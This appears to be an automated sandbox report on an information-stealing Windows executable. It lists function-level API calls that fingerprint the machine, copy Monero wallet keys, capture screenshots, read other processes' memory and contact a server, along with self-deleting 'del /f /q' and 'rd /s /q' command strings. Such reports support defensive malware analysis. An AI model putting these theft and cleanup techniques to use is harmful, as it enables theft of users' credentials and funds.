String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 17de5c54a18c580f0952cb052b1dbc1d0e5d0a26437735ea598e1f553a9ea994
Instruction ID: e7f45f16cf5e8901b4e182214b9e02e8c3b3d3996706cd02e18a07c537ab9314
Opcode Fuzzy Hash: 17de5c54a18c580f0952cb052b1dbc1d0e5d0a26437735ea598e1f553a9ea994
Instruction Fuzzy Hash: 2C5199B1D402299BCB61EB55DC82AEDB37CEB05704F4144E5AB08B7152DB706F8A8F74

Function 00D625FE Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00D62631
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D62671
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00D626C6
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00D626CD
wsprintfA.USER32 ref: 00D62703
lstrcatA.KERNEL32(00000000,00D87DD8), ref: 00D62712

Part of subcall function 00D632E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00D632FB
Part of subcall function 00D632E0: _memset.LIBCMT ref: 00D6332A
Part of subcall function 00D632E0: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00D63352
Part of subcall function 00D632E0: lstrcatA.KERNEL32(?,00D87E68,?,?,?,?,?), ref: 00D6336F

lstrlenA.KERNEL32(?), ref: 00D62729

Part of subcall function 00D6421B: malloc.MSVCRT ref: 00D64220
Part of subcall function 00D6421B: strncpy.MSVCRT ref: 00D64231

lstrcatA.KERNEL32(00000000,00000000), ref: 00D6274C

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Strings

QuBi, xrefs: 00D62683
C, xrefs: 00D6263B
:\, xrefs: 00D62662

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C$QuBi
API String ID: 1856320939-239756005
Opcode ID: ba3ac343e51b68fbd72e5cba04b78424ca4682fa7af70a9f74d05b624d9528ef
Instruction ID: 7d65f5cdd4a4254b403aa5c009ea50853cf1091d4d4719e3c2828d1a36d8a1cb
Opcode Fuzzy Hash: ba3ac343e51b68fbd72e5cba04b78424ca4682fa7af70a9f74d05b624d9528ef
Instruction Fuzzy Hash: 14417E7194522CABCB259F749D45AEEBBB8EF09300F0000E6F549E3121D6708F958FB4

Function 00D63BB1 Relevance: 18.1, APIs: 12, Instructions: 147COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D63BF2
GetDesktopWindow.USER32 ref: 00D63C00
GetWindowRect.USER32(00000000,?), ref: 00D63C0D
SelectObject.GDI32(?,00000000), ref: 00D63C3A
GetHGlobalFromStream.COMBASE(?,?), ref: 00D63CA5
GlobalLock.KERNEL32(?), ref: 00D63CAE
GlobalSize.KERNEL32(?), ref: 00D63CBA

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D553AA: lstrlenA.KERNEL32(?), ref: 00D55441
Part of subcall function 00D553AA: StrCmpCA.SHLWAPI(?,00D87A3B,00D87A3A,00D87A37,00D87A2F), ref: 00D554B0
Part of subcall function 00D553AA: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D554D2

SelectObject.GDI32(?,?), ref: 00D63D18
DeleteObject.GDI32(?), ref: 00D63D33
DeleteObject.GDI32(?), ref: 00D63D3C
ReleaseDC.USER32(00000000,00000000), ref: 00D63D44
CloseWindow.USER32(00000000), ref: 00D63D4B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 1802806997-0
Opcode ID: a4271da58120400352116ddce88be6188447869151e0862ce2b669726fb52a09
Instruction ID: aef847c39219e4c57148248327cb7f067df140a3745ec37d0ee3cceec384c386
Opcode Fuzzy Hash: a4271da58120400352116ddce88be6188447869151e0862ce2b669726fb52a09
Instruction Fuzzy Hash: 1951E67680011CBFDF51AFA4ED498EEBF79EF48310B104126FA05E2130D7359A59EBA1

Function 00D68F92 Relevance: 18.1, APIs: 8, Strings: 2, Instructions: 592networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D628AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D513A9), ref: 00D628BB
Part of subcall function 00D628AF: HeapAlloc.KERNEL32(00000000,?,?,?,00D513A9), ref: 00D628C2
Part of subcall function 00D628AF: GetUserNameA.ADVAPI32(00000000,00D513A9), ref: 00D628D6

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

CloseHandle.KERNEL32(00000000,?,?,?,?,00D69D6E), ref: 00D69007
OpenEventA.KERNEL32(001F0003,00000000,?,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D69013
CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00D69D6E), ref: 00D69024
CreateDirectoryA.KERNEL32(?,00000000,00D87803), ref: 00D69249
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D69307
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D6931A

Part of subcall function 00D625FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 00D62631
Part of subcall function 00D625FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D62671
Part of subcall function 00D625FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00D626C6
Part of subcall function 00D625FE: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00D626CD

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D54A56: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D54AF5
Part of subcall function 00D54A56: StrCmpCA.SHLWAPI(?), ref: 00D54B13

Part of subcall function 00D656FF: StrCmpCA.SHLWAPI(?,block,?,?,00D69377), ref: 00D65714
Part of subcall function 00D656FF: ExitProcess.KERNEL32 ref: 00D6571F

Part of subcall function 00D55E61: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D55F00
Part of subcall function 00D55E61: StrCmpCA.SHLWAPI(?), ref: 00D55F1E

Part of subcall function 00D64DE6: strtok_s.MSVCRT ref: 00D64E05
Part of subcall function 00D64DE6: strtok_s.MSVCRT ref: 00D64E88

Sleep.KERNEL32(000003E8), ref: 00D696C8

Part of subcall function 00D55E61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D560B6
Part of subcall function 00D55E61: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00D560FA
Part of subcall function 00D55E61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D5612C

Part of subcall function 00D64387: SHFileOperationA.SHELL32(?), ref: 00D643BD

Part of subcall function 00D68D90: SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 00D68DB4
Part of subcall function 00D68D90: wsprintfA.USER32 ref: 00D68DD5
Part of subcall function 00D68D90: FindFirstFileA.KERNEL32(?,?), ref: 00D68DEC
Part of subcall function 00D68D90: _mbscmp.MSVCRT ref: 00D68E13
Part of subcall function 00D68D90: _mbscmp.MSVCRT ref: 00D68E2B
Part of subcall function 00D68D90: _splitpath.MSVCRT ref: 00D68E66
Part of subcall function 00D68D90: _ismbcupper.MSVCRT ref: 00D68EB3

CloseHandle.KERNEL32(?), ref: 00D697C6

Part of subcall function 00D69A4C: _memset.LIBCMT ref: 00D69A71
Part of subcall function 00D69A4C: _memset.LIBCMT ref: 00D69A80
Part of subcall function 00D69A4C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00D69A95
Part of subcall function 00D69A4C: ShellExecuteEx.SHELL32(?), ref: 00D69C35
Part of subcall function 00D69A4C: _memset.LIBCMT ref: 00D69C44
Part of subcall function 00D69A4C: _memset.LIBCMT ref: 00D69C56

Strings

fc02efe1cfb2a62f36f33fff0274fb41, xrefs: 00D6933F
abc_, xrefs: 00D68FC7

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: InternetOpen$Heap_memsetlstrcpy$FileProcess$AllocCloseCreateDirectoryEventHandleName_mbscmpstrtok_s$ConnectExecuteExitFindFirstFolderHttpInformationModuleOperationOptionPathRequestShellSleepUserVolumeWindows_ismbcupper_splitpathlstrcatlstrlenwsprintf
String ID: abc_$fc02efe1cfb2a62f36f33fff0274fb41
API String ID: 2811409911-3515656284
Opcode ID: fae15f1980a260e06bd21c0a3b6d7e90cb5c4b122f3a03557473094bc3f3ac8d
Instruction ID: 61182e086ed11db167d34f3c823fff6cc769765d925acdf06eac09b05df5f057
Opcode Fuzzy Hash: fae15f1980a260e06bd21c0a3b6d7e90cb5c4b122f3a03557473094bc3f3ac8d
Instruction Fuzzy Hash: 9D3258729487408BCA20FB65D847A9EF7E5FF80300F51491AF98857261DB719A0DCBB3

Function 00D68615 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D5688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00D568F1
Part of subcall function 00D5688F: StrCmpCA.SHLWAPI(?), ref: 00D5690B
Part of subcall function 00D5688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D5693A
Part of subcall function 00D5688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00D56979
Part of subcall function 00D5688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D569A9
Part of subcall function 00D5688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D569B4
Part of subcall function 00D5688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00D569D8

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

StrCmpCA.SHLWAPI(?,ERROR), ref: 00D68669
lstrlenA.KERNEL32(?), ref: 00D68674

Part of subcall function 00D63A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00D68680,?), ref: 00D63A93

StrStrA.SHLWAPI(00000000,?), ref: 00D68689
lstrlenA.KERNEL32(?), ref: 00D68698
lstrlenA.KERNEL32(00000000), ref: 00D686B1

Strings

ERROR, xrefs: 00D686CD
ERROR, xrefs: 00D68663
ERROR, xrefs: 00D686BC
ERROR, xrefs: 00D686D4
ERROR, xrefs: 00D686C6

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: 5ddc671c996b5af9fbfdc0f459b2f68630886116bae3043f20db97e72305dde3
Instruction ID: 83888995a899d5488b946a002d4a070e874aefeada8516ba3e52e4a315c7e3c5
Opcode Fuzzy Hash: 5ddc671c996b5af9fbfdc0f459b2f68630886116bae3043f20db97e72305dde3
Instruction Fuzzy Hash: 82219231D04108ABCB20BBB4DC468AE77A4EF05350B244166FD01A3261DB74DE0DEBF0

Function 00D51AA8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D51ACC

Part of subcall function 00D51A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00D51A55
Part of subcall function 00D51A41: HeapAlloc.KERNEL32(00000000), ref: 00D51A5C
Part of subcall function 00D51A41: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00D51AD9), ref: 00D51A79
Part of subcall function 00D51A41: RegQueryValueExA.ADVAPI32(00D51AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00D51A94
Part of subcall function 00D51A41: RegCloseKey.ADVAPI32(00D51AD9), ref: 00D51A9D

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00D51AE1
lstrlenA.KERNEL32(?), ref: 00D51AEE
lstrcatA.KERNEL32(?,.keys), ref: 00D51B09

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

CopyFileA.KERNEL32(?,?,00000001), ref: 00D51C1A

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

DeleteFileA.KERNEL32(?), ref: 00D51C8D

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

Strings

\Monero\wallet.keys, xrefs: 00D51B1F
.keys, xrefs: 00D51AFD

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 615783205-3586502688
Opcode ID: 0a9e93a3676a25029f85c69a1b69561a869e8578dff24170396328b4594b03b9
Instruction ID: 4a07e2d6748dd788f4ba05b86140fd01797f559df1a665befb0b51533b10d9d3
Opcode Fuzzy Hash: 0a9e93a3676a25029f85c69a1b69561a869e8578dff24170396328b4594b03b9
Instruction Fuzzy Hash: CC51F771D8022E9BCF21BB64DC46AED7378EF05305F4044A1BA08B7152DA71AF998FB4

Function 00D6187B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 00D618A0
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 00D618CC
_memset.LIBCMT ref: 00D61911
ReadProcessMemory.KERNEL32(?,00000000,?,00000208,00000000), ref: 00D61976
_memset.LIBCMT ref: 00D61A02
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00D61A63

Part of subcall function 00D6045E: _memmove.LIBCMT ref: 00D60478

Strings

N0ZWFt, xrefs: 00D619BF

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Process_memset$MemoryOpenRead_memmove
String ID: N0ZWFt
API String ID: 1717157771-431618156
Opcode ID: bed3caddfb35b04934a0f74f27449abe2823ff0479120ed4844948d49783931d
Instruction ID: 4a8744ed731e0a20cf8e6b54ce2f393158d813b3006e125dd5db144d3ef39930
Opcode Fuzzy Hash: bed3caddfb35b04934a0f74f27449abe2823ff0479120ed4844948d49783931d
Instruction Fuzzy Hash: 065171B5D002289FDF20AF548C85BEDB779EB45304F0401EAE719A7252DA716EC88F75

Function 00D63230 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D63263
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00D63282
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00D632A7
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00D632B3
CharToOemA.USER32(?,?), ref: 00D632C7

Strings

MachineGuid, xrefs: 00D6329C
SOFTWARE\Microsoft\Cryptography, xrefs: 00D63278

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: 37d9931964a9cc27d6feac10d5417cf52dd884b8931ecf36137bca2242955fa4
Instruction ID: faaab516b906aaa0241ae99b04aeda7beb4faa1b502e02f7dba6661b2436b4c2
Opcode Fuzzy Hash: 37d9931964a9cc27d6feac10d5417cf52dd884b8931ecf36137bca2242955fa4
Instruction Fuzzy Hash: C2111EB590031DAFDB10EB60DC89EEAB7BCEB04304F0041E5B659E2162E6709E899F60

Function 00D51A41 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00D51A55
HeapAlloc.KERNEL32(00000000), ref: 00D51A5C
